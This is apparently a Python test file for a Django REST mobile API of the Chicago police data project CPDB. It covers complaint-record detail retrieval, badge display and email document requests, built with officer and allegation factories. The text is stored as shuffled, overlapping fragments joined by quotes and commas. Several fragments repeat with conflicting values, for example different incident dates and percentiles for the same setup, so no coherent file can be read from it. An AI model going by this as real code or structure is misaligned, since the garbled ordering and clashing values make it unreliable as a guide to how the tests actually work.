"tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response =", "internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28,", "{ 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date':", "'7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD',", ") OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False )", "'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count':", "end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' ) ) officer = OfficerFactory(", "} ], 'victims': [ { 'race': 'Black', 'gender': 'Male', 'age': 53 } ],", "allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki',", "trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28,", "file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345',", "'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510", "'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', },", "'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id':", "} ] }) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123,", "file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns()", "import patch from rest_framework.test import APITestCase from rest_framework import status from robber import", "'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge':", "investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1,", "'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name':", "document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_not_found(self): response", "start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' ) )", "'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation':", "'2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [ { 'race': 'Black', 'gender': 'Male', 'age':", "'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ],", "class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123,", ") OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28,", "2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation,", "from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST", "System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>',", "21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area,", "], 'complainants': [ { 'race': 'Black', 'gender': 'Male', 'age': 18 } ], 'victims':", "[ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id':", "def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message':", "self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name':", "'3510 Michigan Ave, Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [", "'<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA',", ") ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU',", "'12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment'", "from django.contrib.gis.geos import Point from mock import patch from rest_framework.test import APITestCase from", "allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 = self.client.post(", "gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5,", "appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003,", "allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations',", "'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications System',", "'race': 'Black', 'gender': 'Male', 'age': 18 } ], 'victims': [ { 'race': 'Black',", "allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory(", "'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id':", ") response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message':", "'<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({", "'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge':", "kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' })", "Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1),", "= OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, )", "}, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian':", "'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location':", "first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU',", "last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory(", "allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR", "incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False,", "{ 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1,", "'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_allegation(self): response", "already added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}))", "} ], 'complainants': [ { 'race': 'Black', 'gender': 'Male', 'age': 18 } ],", "allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2',", "title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321',", "import expect import pytz from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory,", "'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ], 'attachments': [ {", ") investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8,", "} ], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28',", "'percentile_trr': '5.5000', } ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url':", "'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal':", "django.contrib.gis.geos import Point from mock import patch from rest_framework.test import APITestCase from rest_framework", "321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321')", "'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000',", "'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510", "enter a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}),", "'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago',", "data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class", "beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black',", "kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special", "3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ],", "status from robber import expect import pytz from data.factories import ( OfficerFactory, AllegationFactory,", "appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2,", "'9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document',", "VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import", "response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks", "<reponame>invinst/CPDBv2_backend<filename>cpdb/cr/tests/views/test_cr_mobile_viewset.py from datetime import datetime, date from django.urls import reverse from django.contrib.gis.geos import", "start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator =", "'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr':", "{ 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] })", "'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type':", "{ 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4,", "= AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago',", "first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M',", "test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please", "'112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message':", "'age': 18 } ], 'victims': [ { 'race': 'Black', 'gender': 'Male', 'age': 53", "self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing',", "current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False )", "area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer',", "'complainants': [ { 'race': 'Black', 'gender': 'Male', 'age': 18 } ], 'victims': [", "'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1", "21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan", "arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321',", "'message': 'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def", "APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo',", "18 } ], 'victims': [ { 'race': 'Black', 'gender': 'Male', 'age': 53 }", "], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date':", "'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000',", "'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name':", "allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002,", "'victims': [ { 'race': 'Black', 'gender': 'Male', 'age': 53 } ], 'point': {", "OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, )", "'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000',", "'<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [", "28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001,", "= self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' })", "'6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>',", "Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type':", "CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr',", "OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory(", ") InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation,", "1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', }", "import pytz from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory,", "'7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD',", "current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR',", "allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail',", "email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area", ") investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin',", "allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc),", "'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail',", "race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5,", ") investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document',", "allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT )", "tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest", "28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1,", "document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'}))", "{ 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000',", "pytz from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory,", "}, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave,", "allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1),", "'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln", "investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator,", "VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20),", "'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants':", "AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response", "'123456', } ] }) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory(", "response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email", "'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ { 'id':", "'8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1,", ") AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation,", "reverse from django.contrib.gis.geos import Point from mock import patch from rest_framework.test import APITestCase", "= OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, )", "import Point from mock import patch from rest_framework.test import APITestCase from rest_framework import", "url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT )", "expect import pytz from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory,", "investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None )", "'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000',", "] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self,", "self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email'", ") def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'}", "complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003,", "'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk':", "'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police", "2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK)", "last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation,", ") InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR',", "datetime import datetime, date from django.urls import reverse from django.contrib.gis.geos import Point from", "5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2,", "12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address':", "from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self):", "allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR", "sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2,", "investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( 